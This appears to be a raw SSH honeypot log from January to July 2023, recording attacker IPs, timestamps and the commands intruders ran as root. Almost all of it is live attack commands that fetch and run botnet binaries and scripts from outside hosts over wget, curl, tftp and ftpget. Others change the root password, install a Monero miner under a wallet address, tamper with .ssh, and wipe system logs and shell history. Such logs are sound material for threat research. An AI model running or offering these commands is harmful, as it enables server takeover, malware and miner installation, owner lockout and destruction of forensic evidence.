From 148.72.247.138 5-Jan-2023 04:12:30 ssh2 root Exec curl -Ls http://209.141.34.192/jack5tr.sh | sh curl -Ls http://209.141.34.192/jack5tr.sh | sh From 148.72.247.138 5-Jan-2023 04:49:57 ssh2 root Exec cd /tmp; wget http://209.141.34.192/idk/home.arc -o arc;chmod 777 arc;./arc;wget http://209.141.34.192/idk/home.arm -o arm;chmod 777 arm;./arm;wget http://209.141.34.192/idk/home.arm5 -o arm5;chmod 777 arm5;./arm5;wget http://209.141.34.192/idk/home.arm6 -o arm6;chmod 777 arm6;./arm6;wget http://209.141.34.192/idk/home.arm7 -o arm7;chmod 777 arm7;./arm7;wget http://209.141.34.192/idk/home.m68k -o m68k;chmod 777 m68k;./m68k;wget http://209.141.34.192/idk/home.mips -o mips;chmod 777 mips;./mips;wget http://209.141.34.192/idk/home.mpsl -o mpsl;chmod 777 mpsl;./mpsl;wget http://209.141.34.192/idk/home.ppc -o ppc;chmod 777 ppc;./ppc;wget http://209.141.34.192/idk/home.sh4 -o sh4;chmod 777 sh4;./sh4;wget http://209.141.34.192/idk/home.spc -o spc;chmod 777 spc;./spc;wget http://209.141.34.192/idk/home.x86 -o x86;chmod 777 x86;./x86 cd /tmp wget http://209.141.34.192/idk/home.arc -o arc chmod 777 arc ./arc wget http://209.141.34.192/idk/home.arm -o arm chmod 777 arm ./arm wget http://209.141.34.192/idk/home.arm5 -o arm5 chmod 777 arm5 ./arm5 wget http://209.141.34.192/idk/home.arm6 -o arm6 chmod 777 arm6 ./arm6 wget http://209.141.34.192/idk/home.arm7 -o arm7 chmod 777 arm7 ./arm7 wget http://209.141.34.192/idk/home.m68k -o m68k chmod 777 m68k ./m68k wget http://209.141.34.192/idk/home.mips -o mips chmod 777 mips ./mips wget http://209.141.34.192/idk/home.mpsl -o mpsl chmod 777 mpsl ./mpsl wget http://209.141.34.192/idk/home.ppc -o ppc chmod 777 ppc ./ppc wget http://209.141.34.192/idk/home.sh4 -o sh4 chmod 777 sh4 ./sh4 wget http://209.141.34.192/idk/home.spc -o spc chmod 777 spc ./spc wget http://209.141.34.192/idk/home.x86 -o x86 chmod 777 x86 ./x86 From 158.140.119.157 20-Jan-2023 16:04:49 ssh2 root free -m From 82.205.13.88 21-Jan-2023 11:27:14 ssh2 root ls free -m From 181.64.10.35 26-Jan-2023 21:12:38 ssh2 root Exec wget http://194.180.49.134/pedalcheta/cutie.x86_64; curl -O http://194.180.49.134/pedalcheta/cutie.x86_64; chmod 777 cutie.*; ./cutie.x86_64 x86h; rm -rf cutie.* wget http://194.180.49.134/pedalcheta/cutie.x86_64 curl -O http://194.180.49.134/pedalcheta/cutie.x86_64 chmod 777 cutie.* ./cutie.x86_64 x86h rm -rf cutie.* From 181.64.10.35 27-Jan-2023 03:36:29 ssh2 root Exec lscpu | grep "CPU(s): " && echo -e "Wh4H39xC\nWh4H39xC" | passwd && wget http://194.180.49.134/pedalcheta/cutie.x86_64; curl -O http://194.180.49.134/pedalcheta/cutie.x86_64; chmod 777 cutie.*; ./cutie.x86_64 x86h; rm -rf cutie.* lscpu | grep "CPU(s): " echo -e "Wh4H39xC\nWh4H39xC" | passwd wget http://194.180.49.134/pedalcheta/cutie.x86_64 curl -O http://194.180.49.134/pedalcheta/cutie.x86_64 chmod 777 cutie.* ./cutie.x86_64 x86h rm -rf cutie.* From 181.64.10.35 27-Jan-2023 08:26:51 ssh2 root Exec lscpu | grep "CPU(s): " && echo -e "QjJsxzCz\nQjJsxzCz" | passwd && wget http://194.180.49.134/pedalcheta/cutie.x86_64; curl -O http://194.180.49.134/pedalcheta/cutie.x86_64; chmod 777 cutie.*; ./cutie.x86_64 x86h; rm -rf cutie.* lscpu | grep "CPU(s): " echo -e "QjJsxzCz\nQjJsxzCz" | passwd wget http://194.180.49.134/pedalcheta/cutie.x86_64 curl -O http://194.180.49.134/pedalcheta/cutie.x86_64 chmod 777 cutie.* ./cutie.x86_64 x86h rm -rf cutie.* From 181.64.10.35 27-Jan-2023 09:27:16 ssh2 root Exec lscpu | grep "CPU(s): " && echo -e "UeRP5vZx\nUeRP5vZx" | passwd && wget http://194.180.49.134/pedalcheta/cutie.x86_64; curl -O http://194.180.49.134/pedalcheta/cutie.x86_64; chmod 777 cutie.*; ./cutie.x86_64 x86h; rm -rf cutie.* lscpu | grep "CPU(s): " echo -e "UeRP5vZx\nUeRP5vZx" | passwd wget http://194.180.49.134/pedalcheta/cutie.x86_64 curl -O http://194.180.49.134/pedalcheta/cutie.x86_64 chmod 777 cutie.* ./cutie.x86_64 x86h rm -rf cutie.* From 181.64.10.35 27-Jan-2023 14:54:53 ssh2 root Exec lscpu | grep "CPU(s): " && echo -e "YSDVwzc4\nYSDVwzc4" | passwd && wget http://194.180.49.134/pedalcheta/cutie.x86_64; curl -O http://194.180.49.134/pedalcheta/cutie.x86_64; chmod 777 cutie.*; ./cutie.x86_64 x86h; rm -rf cutie.* lscpu | grep "CPU(s): " echo -e "YSDVwzc4\nYSDVwzc4" | passwd wget http://194.180.49.134/pedalcheta/cutie.x86_64 curl -O http://194.180.49.134/pedalcheta/cutie.x86_64 chmod 777 cutie.* ./cutie.x86_64 x86h rm -rf cutie.* From 20.164.37.170 27-Jan-2023 17:38:37 ssh2 root Exec cat /proc/uptime cat /proc/uptime Exec cat /proc/uptime cat /proc/uptime Exec cat /proc/uptime cat /proc/uptime Exec cat /proc/uptime cat /proc/uptime From 181.64.10.35 27-Jan-2023 18:56:05 ssh2 root Exec lscpu | grep "CPU(s): " && echo -e "QfHpPJjt\nQfHpPJjt" | passwd && wget http://194.180.49.134/pedalcheta/cutie.x86_64; curl -O http://194.180.49.134/pedalcheta/cutie.x86_64; chmod 777 cutie.*; ./cutie.x86_64 x86h; rm -rf cutie.* lscpu | grep "CPU(s): " echo -e "QfHpPJjt\nQfHpPJjt" | passwd wget http://194.180.49.134/pedalcheta/cutie.x86_64 curl -O http://194.180.49.134/pedalcheta/cutie.x86_64 chmod 777 cutie.* ./cutie.x86_64 x86h rm -rf cutie.* From 181.64.10.35 27-Jan-2023 23:57:05 ssh2 root Exec lscpu | grep "CPU(s): " && echo -e "TFPNqqrA\nTFPNqqrA" | passwd && wget http://194.180.49.134/pedalcheta/cutie.x86_64; curl -O http://194.180.49.134/pedalcheta/cutie.x86_64; chmod 777 cutie.*; ./cutie.x86_64 x86h; rm -rf cutie.* lscpu | grep "CPU(s): " echo -e "TFPNqqrA\nTFPNqqrA" | passwd wget http://194.180.49.134/pedalcheta/cutie.x86_64 curl -O http://194.180.49.134/pedalcheta/cutie.x86_64 chmod 777 cutie.* ./cutie.x86_64 x86h rm -rf cutie.* From 159.89.177.99 28-Jan-2023 12:51:37 ssh2 root Exec lscpu && echo -e "e6HpWyGH\ne6HpWyGH" | passwd lscpu echo -e "e6HpWyGH\ne6HpWyGH" | passwd From 34.23.185.255 29-Jan-2023 04:08:13 ssh2 root Exec lscpu | grep "CPU(s): " && echo -e "aCUsGMQF\naCUsGMQF" | passwd && wget http://194.180.49.134/pedalcheta/cutie.x86_64; curl -O http://194.180.49.134/pedalcheta/cutie.x86_64; chmod 777 cutie.*; ./cutie.x86_64 x86h; rm -rf cutie.* lscpu | grep "CPU(s): " echo -e "aCUsGMQF\naCUsGMQF" | passwd wget http://194.180.49.134/pedalcheta/cutie.x86_64 curl -O http://194.180.49.134/pedalcheta/cutie.x86_64 chmod 777 cutie.* ./cutie.x86_64 x86h rm -rf cutie.* From 148.72.247.138 30-Jan-2023 05:23:15 ssh2 root Exec whoami>sbmg whoami>sbmg From 148.72.247.138 30-Jan-2023 11:27:15 ssh2 root Exec cat sbmg cat sbmg From 38.91.107.43 2-Feb-2023 12:21:23 ssh2 root Exec lscpu | grep "CPU(s): " && echo -e "Uym3g3CQ\nUym3g3CQ" | passwd && wget http://194.180.49.134/pedalcheta/cutie.x86_64; curl -O http://194.180.49.134/pedalcheta/cutie.x86_64; chmod 777 cutie.*; ./cutie.x86_64 x86h; rm -rf cutie.* lscpu | grep "CPU(s): " echo -e "Uym3g3CQ\nUym3g3CQ" | passwd wget http://194.180.49.134/pedalcheta/cutie.x86_64 curl -O http://194.180.49.134/pedalcheta/cutie.x86_64 chmod 777 cutie.* ./cutie.x86_64 x86h rm -rf cutie.* From 181.64.10.35 4-Feb-2023 16:33:47 ssh2 root Exec lscpu | grep "CPU(s): " && echo -e "FvZbzDZr\nFvZbzDZr" | passwd && wget http://163.123.142.241/x86_64; curl -s -O http://163.123.142.241/x86_64; chmod 777 x86_64; ./x86_64 x86h; rm -rf x86_64* lscpu | grep "CPU(s): " echo -e "FvZbzDZr\nFvZbzDZr" | passwd wget http://163.123.142.241/x86_64 curl -s -O http://163.123.142.241/x86_64 chmod 777 x86_64 ./x86_64 x86h rm -rf x86_64* From 141.255.150.190 12-Feb-2023 07:17:00 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.244.75.53/bins.sh; chmod +x bins.sh; sh bins.sh; tftp 104.244.75.53 -c get tftp1.sh; chmod +x tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 104.244.75.53; chmod +x tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 104.244.75.53 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://104.244.75.53/bins.sh chmod +x bins.sh sh bins.sh tftp 104.244.75.53 -c get tftp1.sh chmod +x tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 104.244.75.53 chmod +x tftp2.sh sh tftp2.sh ftpget -v -u anonymous -p anonymous -P 21 104.244.75.53 ftp1.sh ftp1.sh sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh From 104.244.75.53 15-Feb-2023 05:56:21 ssh2 root Exec cat /etc/passwd | grep sh cat /etc/passwd | grep sh From 107.175.127.57 1-Mar-2023 16:33:03 ssh2 root Exec cat > kg9at; chmod +x kg9at; ./kg9at & cat > kg9at chmod +x kg9at ./kg9at From 159.89.174.36 3-Mar-2023 12:14:43 ssh2 root Exec uname -s -n -r -i uname -s -n -r -i From 141.98.11.87 3-Mar-2023 19:47:58 ssh2 root Exec lscpu | grep "CPU(s): " && echo -e "VUtj9cSZ\nVUtj9cSZ" | passwd && wget http://109.206.240.49/x86_64; curl -s -O http://109.206.240.49/x86_64; chmod 777 x86_64; ./x86_64 turkey86; rm -rf x86_64* lscpu | grep "CPU(s): " echo -e "VUtj9cSZ\nVUtj9cSZ" | passwd wget http://109.206.240.49/x86_64 curl -s -O http://109.206.240.49/x86_64 chmod 777 x86_64 ./x86_64 turkey86 rm -rf x86_64* From 141.98.10.217 5-Mar-2023 20:00:18 ssh2 root Exec lscpu | grep "CPU(s): " && echo -e "weHmU3gp\nweHmU3gp" | passwd && wget http://45.125.66.144/x86_64; curl -s -O http://45.125.66.144/x86_64; chmod 777 x86_64; ./x86_64 x86h; rm -rf x86_64* lscpu | grep "CPU(s): " echo -e "weHmU3gp\nweHmU3gp" | passwd wget http://45.125.66.144/x86_64 curl -s -O http://45.125.66.144/x86_64 chmod 777 x86_64 ./x86_64 x86h rm -rf x86_64* From 222.248.193.63 15-Mar-2023 13:51:20 ssh2 root Exec cat > ; chmod +x ; ./ & cat > chmod +x ./ From 83.9.84.21 24-Mar-2023 15:02:30 ssh2 root Exec cd /tmp || cd /var/tmp || cd /root || cd /; wget http://193.35.18.163/html.sh; curl -O http://193.35.18.163/html.sh; chmod +x html.sh; sh html.sh; /bin/busybox ftpget -u anonymous -p anonymous -P 21 193.35.18.163 ftp.sh ftp.sh -v; chmod +x ftp.sh; sh ftp.sh; /bin/busybox tftp -g -r tftp.sh; sh tftp.sh; tftp 193.35.18.163 -c get tftp2.sh; chmod +x tftp2.sh; sh tftp2.sh; rm -rf html.sh ftp.sh tftp.sh tftp2.sh cd /tmp || cd /var/tmp || cd /root || cd / wget http://193.35.18.163/html.sh curl -O http://193.35.18.163/html.sh chmod +x html.sh sh html.sh /bin/busybox ftpget -u anonymous -p anonymous -P 21 193.35.18.163 ftp.sh ftp.sh -v chmod +x ftp.sh sh ftp.sh /bin/busybox tftp -g -r tftp.sh sh tftp.sh tftp 193.35.18.163 -c get tftp2.sh chmod +x tftp2.sh sh tftp2.sh rm -rf html.sh ftp.sh tftp.sh tftp2.sh From 185.213.155.174 26-Mar-2023 00:38:39 ssh2 root Exec cd /tmp || cd /var/tmp || cd /root || cd /; wget http://193.35.18.163/html.sh; curl -O http://193.35.18.163/html.sh; chmod +x html.sh; sh html.sh; rm -rf html.sh cd /tmp || cd /var/tmp || cd /root || cd / wget http://193.35.18.163/html.sh curl -O http://193.35.18.163/html.sh chmod +x html.sh sh html.sh rm -rf html.sh From 173.188.1.111 29-Mar-2023 21:48:27 ssh2 root Exec sudo mount -o remount,rw / || mount -o remount,rw /; mkdir -p /tmp/criptonize/criptonize2 || mkdir -p /var/tmp/criptonize/criptonize2 || mkdir -p /dev/criptonize/criptonize2 || mkdir -p criptonize/criptonize2; cd /tmp/criptonize || cd /var/tmp/criptonize || cd /dev/criptonize || cd criptonize; ls -F sudo mount -o remount,rw / || mount -o remount,rw / mkdir -p /tmp/criptonize/criptonize2 || mkdir -p /var/tmp/criptonize/criptonize2 || mkdir -p /dev/criptonize/criptonize2 || mkdir -p criptonize/criptonize2 cd /tmp/criptonize || cd /var/tmp/criptonize || cd /dev/criptonize || cd criptonize ls -F From 185.224.128.215 24-Apr-2023 03:47:16 ssh2 root Exec top -b -n 1 top -b -n 1 From 141.98.10.172 24-Apr-2023 10:31:31 ssh2 root Exec lscpu | grep "CPU(s): " && echo -e "qmK2ZvdE\nqmK2ZvdE" | passwd && cd /tmp; wget http://45.95.146.26/pedalcheta/cutie.x86_64; curl -s -O http://45.95.146.26/pedalcheta/cutie.x86_64; chmod 777 cutie.x86_64; ./cutie.x86_64 x86h; rm -rf cutie.* lscpu | grep "CPU(s): " echo -e "qmK2ZvdE\nqmK2ZvdE" | passwd cd /tmp wget http://45.95.146.26/pedalcheta/cutie.x86_64 curl -s -O http://45.95.146.26/pedalcheta/cutie.x86_64 chmod 777 cutie.x86_64 ./cutie.x86_64 x86h rm -rf cutie.* From 141.98.10.172 26-Apr-2023 05:47:26 ssh2 root Exec lscpu | grep "CPU(s): " && echo -e "7aep3j7d\n7aep3j7d" | passwd && cd /tmp; wget http://45.95.146.26/pedalcheta/cutie.x86_64; curl -s -O http://45.95.146.26/pedalcheta/cutie.x86_64; chmod 777 cutie.x86_64; ./cutie.x86_64 x86h; rm -rf cutie.* lscpu | grep "CPU(s): " echo -e "7aep3j7d\n7aep3j7d" | passwd cd /tmp wget http://45.95.146.26/pedalcheta/cutie.x86_64 curl -s -O http://45.95.146.26/pedalcheta/cutie.x86_64 chmod 777 cutie.x86_64 ./cutie.x86_64 x86h rm -rf cutie.* From 185.224.128.121 27-May-2023 08:50:32 ssh2 root Exec lscpu | grep "CPU(s): " && echo -e "GRrvAxKNNXPe\nGRrvAxKNNXPe" | passwd && cd /tmp; wget http://84.54.50.198/pedalcheta/cutie.x86_64; curl -s -O http://84.54.50.198/pedalcheta/cutie.x86_64; chmod 777 cutie.x86_64; ./cutie.x86_64 x86h; rm -rf cutie.*; cd /root; rm -rf *; pkill xmrig lscpu | grep "CPU(s): " echo -e "GRrvAxKNNXPe\nGRrvAxKNNXPe" | passwd cd /tmp wget http://84.54.50.198/pedalcheta/cutie.x86_64 curl -s -O http://84.54.50.198/pedalcheta/cutie.x86_64 chmod 777 cutie.x86_64 ./cutie.x86_64 x86h rm -rf cutie.* cd /root rm -rf * pkill xmrig From 185.224.128.141 29-May-2023 01:27:01 ssh2 root Exec lscpu | grep "CPU(s): " && echo -e "8eDZ8J2qWyES\n8eDZ8J2qWyES" | passwd && cd /tmp; wget http://84.54.50.198/pedalcheta/cutie.x86_64; curl -s -O http://84.54.50.198/pedalcheta/cutie.x86_64; chmod 777 cutie.x86_64; ./cutie.x86_64 x86h lscpu | grep "CPU(s): " echo -e "8eDZ8J2qWyES\n8eDZ8J2qWyES" | passwd cd /tmp wget http://84.54.50.198/pedalcheta/cutie.x86_64 curl -s -O http://84.54.50.198/pedalcheta/cutie.x86_64 chmod 777 cutie.x86_64 ./cutie.x86_64 x86h From 222.138.252.23 1-Jun-2023 06:07:04 ssh2 root Exec whoami whoami From 222.138.252.23 1-Jun-2023 06:07:08 ssh2 root Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 44XHRLz9VS35WMFVDgY6qBfCGR3mSjw86gDGtU9h9FjWdKSdH5kumvWip4qYc9v6kmepzzJeFSGdbC9ypm58hw6zRYNgbej curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 44XHRLz9VS35WMFVDgY6qBfCGR3mSjw86gDGtU9h9FjWdKSdH5kumvWip4qYc9v6kmepzzJeFSGdbC9ypm58hw6zRYNgbej From 120.48.61.50 6-Jun-2023 13:54:29 ssh2 root Exec cat /proc/uptime cat /proc/uptime Exec cat /proc/uptime cat /proc/uptime From 62.171.188.18 11-Jun-2023 19:32:46 ssh2 root Exec cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c From 81.4.111.62 11-Jun-2023 19:34:25 ssh2 root w ps x clear ps x clear uname -a nproc cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c exit From 36.133.86.212 11-Jun-2023 21:29:48 ssh2 root Exec cd /tmp ; wget 193.233.202.219/bot ; perl bot ; rm -rf bot cd /tmp wget 193.233.202.219/bot perl bot rm -rf bot From 185.224.128.121 20-Jun-2023 10:08:02 ssh2 root Exec uname -a uname -a From 31.94.63.220 27-Jun-2023 07:15:32 ssh2 root w ps aux wget cd /tmp unset HISTFILE unset HISTSAVE history -n unset WATCH export HISTFILE=/dev/null cd /var/log/ rm -rf wtmp rm -rf secure cd /var/log/ rm -rf lastlog rm -rf messages touch messagess touch wtmp touch secure touch lastlog cd /root rm -rf .bash_history touch .bash_history unset rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog unset HISTFILE unset HISTSAVE unset HISTLOG history -n unset WATCH export HISTFILE=/dev/null export HISTFILE=/dev/null wget http://81.68.84.38/.-/xx From 42.81.126.15 7-Jul-2023 16:15:16 ssh2 root Exec cat /proc/uptime cat /proc/uptime From 138.197.88.77 7-Jul-2023 18:58:02 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://beautypluspartner.ml/mnoger.sh; chmod 777 mnoger.sh; sh mnoger.sh; tftp beautypluspartner.ml -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g beautypluspartner.ml; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://beautypluspartner.ml/mnoger.sh chmod 777 mnoger.sh sh mnoger.sh tftp beautypluspartner.ml -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g beautypluspartner.ml chmod 777 tftp2.sh sh tftp2.sh rm -rf * From 139.59.20.195 9-Jul-2023 14:30:05 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://masarotunda.ml/mnoger.sh; chmod 777 mnoger.sh; sh mnoger.sh; tftp masarotunda.ml -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g masarotunda.ml; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://masarotunda.ml/mnoger.sh chmod 777 mnoger.sh sh mnoger.sh tftp masarotunda.ml -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g masarotunda.ml chmod 777 tftp2.sh sh tftp2.sh rm -rf * From 103.238.71.108 10-Jul-2023 13:23:36 ssh2 root Exec uname -a uname -a From 211.178.70.13 10-Jul-2023 20:46:13 ssh2 root Exec (uname -smr || /bin/uname -smr || /usr/bin/uname -smr) (uname -smr || /bin/uname -smr || /usr/bin/uname -smr) From 180.169.85.126 11-Jul-2023 05:08:12 ssh2 root Exec cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c uname -a From 167.71.142.92 11-Jul-2023 05:12:44 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://horseriding3d.tk/mnoger.sh; chmod 777 mnoger.sh; sh mnoger.sh; tftp horseriding3d.tk -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g horseriding3d.tk; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://horseriding3d.tk/mnoger.sh chmod 777 mnoger.sh sh mnoger.sh tftp horseriding3d.tk -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g horseriding3d.tk chmod 777 tftp2.sh sh tftp2.sh rm -rf * From 73.197.215.95 11-Jul-2023 10:25:22 ssh2 root Exec uname -a || echo - uname -a || echo - From 81.68.162.185 11-Jul-2023 20:46:28 ssh2 root Exec (uname -smr || /bin/uname -smr || /usr/bin/uname -smr) (uname -smr || /bin/uname -smr || /usr/bin/uname -smr) Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" From 81.68.162.185 11-Jul-2023 21:20:20 ssh2 root Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" From 36.110.228.254 12-Jul-2023 00:01:38 ssh2 root Exec /ip cloud print /ip cloud print From 144.91.127.21 12-Jul-2023 00:11:06 ssh2 root Exec uname -m uname -m From 45.95.146.46 17-Jul-2023 00:24:46 ssh2 root Exec mkdir /tmp/cyberboot; cd /tmp/cyberboot;wget http://193.42.32.40/x86_64; curl http://193.42.32.40/x86_64; chmod 777 x86_64; ./x86_64 wns.x86; history -c mkdir /tmp/cyberboot cd /tmp/cyberboot wget http://193.42.32.40/x86_64 curl http://193.42.32.40/x86_64 chmod 777 x86_64 ./x86_64 wns.x86 history -c From 146.70.126.240 19-Jul-2023 15:01:41 ssh2 root top uname -mp From 185.195.232.166 20-Jul-2023 15:16:08 ssh2 root uname -mp top apt find / exit From 170.64.172.88 21-Jul-2023 15:15:58 ssh2 root Exec uname -s -v -n -r -m uname -s -v -n -r -m From 68.183.64.48 23-Jul-2023 07:50:26 ssh2 root Exec cd ~; chattr -ia .ssh; lockr -ia .ssh cd ~ chattr -ia .ssh lockr -ia .ssh From 185.224.128.142 23-Jul-2023 15:43:05 ssh2 root Exec lscpu | grep "CPU(s): " && echo -e "3scMuZ7kAzjc\n3scMuZ7kAzjc" | passwd && cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://109.206.242.217/linux/bins.sh; chmod +x bins.sh; sh bins.sh; rm -rf * lscpu | grep "CPU(s): " echo -e "3scMuZ7kAzjc\n3scMuZ7kAzjc" | passwd cd /tmp cd /var/run cd /mnt cd /root cd / wget http://109.206.242.217/linux/bins.sh chmod +x bins.sh sh bins.sh rm -rf *